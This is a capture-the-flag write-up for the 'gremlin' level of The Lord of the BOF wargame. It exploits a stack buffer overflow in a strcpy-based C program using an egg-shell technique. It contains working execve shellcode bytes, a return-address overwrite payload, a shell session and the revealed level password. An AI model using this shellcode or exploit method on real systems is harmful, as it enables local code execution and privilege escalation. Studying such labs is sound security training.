[LOB] gate -> gremlin

cg10036 2019. 7. 28. 21:42


/*
    The Lord of the BOF : The Fellowship of the BOF 
    - gremlin
    - simple BOF
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);    /* unbounded copy of argv[1]: the overflow */
    printf("%s\n", buffer);
}


This is an ordinary stack buffer overflow problem.


0x8048430 <main>:    push   %ebp
0x8048431 <main+1>:    mov    %ebp,%esp
0x8048433 <main+3>:    sub    %esp,0x100
0x8048439 <main+9>:    cmp    DWORD PTR [%ebp+8],1
0x804843d <main+13>:    jg     0x8048456 <main+38>
0x804843f <main+15>:    push   0x80484e0
0x8048444 <main+20>:    call   0x8048350 <printf>
0x8048449 <main+25>:    add    %esp,4
0x804844c <main+28>:    push   0
0x804844e <main+30>:    call   0x8048360 <exit>
0x8048453 <main+35>:    add    %esp,4
0x8048456 <main+38>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048459 <main+41>:    add    %eax,4
0x804845c <main+44>:    mov    %edx,DWORD PTR [%eax]
0x804845e <main+46>:    push   %edx
0x804845f <main+47>:    lea    %eax,[%ebp-256] // buffer
0x8048465 <main+53>:    push   %eax
0x8048466 <main+54>:    call   0x8048370 <strcpy>
0x804846b <main+59>:    add    %esp,8
0x804846e <main+62>:    lea    %eax,[%ebp-256]
0x8048474 <main+68>:    push   %eax
0x8048475 <main+69>:    push   0x80484ec
0x804847a <main+74>:    call   0x8048350 <printf>
0x804847f <main+79>:    add    %esp,8
0x8048482 <main+82>:    leave  
0x8048483 <main+83>:    ret    


The size of buffer is 256 bytes (sub %esp,0x100), and on LOB the compiler adds no dummy (padding) bytes after it.

The frame is therefore laid out as [BUFFER(256)][SFP(4)][RET(4)], so passing "A"*260 + &SHELL should overwrite the return address and give us a shell.
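As an added illustration (not part of the write-up), the C below models the frame layout just described, reproduces the write-up's input against it so the clobbered SFP and RET are visible, and places a bounded copy beside gremlin's strcpy() to show what stops the overwrite. The zeroed initial frame and a little-endian host are assumptions of the example.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* gremlin's frame as the disassembly shows it: buffer at [ebp-256], then the
 * saved ebp (SFP) at [ebp], then the return address at [ebp+4], no padding. */
struct frame {
    char buffer[256];
    uint32_t sfp;
    uint32_t ret;
};
/* Offset where a copy into buffer starts clobbering RET: 256 + 4 = 260. */
size_t ret_offset(void) { return offsetof(struct frame, ret); }

/* What gremlin's strcpy() does, modelled with an explicit length so the write
 * stays defined: bytes beyond 256 land in sfp, then in ret. Frame starts zeroed. */
struct frame frame_after_copy(const unsigned char *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;   /* the model ends at RET */
    memcpy(&f, input, len);
    return f;
}

/* Bounded replacement for the strcpy(): refuses input that does not fit with
 * its terminator, so argv[1] can never reach SFP or RET. 0 = copied, -1 = refused. */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (n >= dstsz) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* The write-up's input: 260 'A's then 0xbffffaa1 as little-endian bytes
 * (constructed here; reading it back as ret assumes a little-endian host). */
size_t sample_input(unsigned char out[265]) {
    memset(out, 'A', 260);
    out[260] = 0xa1; out[261] = 0xfa; out[262] = 0xff; out[263] = 0xbf;
    out[264] = '\0';   /* terminator so strlen() on it is valid */
    return 264;
}

int main(void) {
    unsigned char in[265];
    char dst[256];
    struct frame f = frame_after_copy(in, sample_input(in));
    printf("RET at +%zu: sfp=0x%08x ret=0x%08x bounded=%d\n", ret_offset(),
           f.sfp, f.ret, copy_arg_bounded(dst, sizeof dst, (const char *)in));
    return 0;
}
```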


Let's solve it with an egg shell (shellcode stored in an environment variable).


[gate@localhost]$ vi getegg.c
[gate@localhost]$ cat getegg.c
#include <stdio.h>
#include <stdlib.h>
 
int main()
{
    printf("%p\n", getenv("EGG"));
}
[gate@localhost]$ gcc getegg.c -o getegg
[gate@localhost]$ export EGG=`python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[gate@localhost]$ ./getegg
0xbffffaa1


I exported the shellcode with 1000 NOPs in front of it. The address of EGG is 0xbffffaa1.


[gate@localhost gate]$ ./gremlin `python -c 'print "A"*260+"\xa1\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¡
bash$ my-pass
euid = 501
hello bof world


gremlin : hello bof world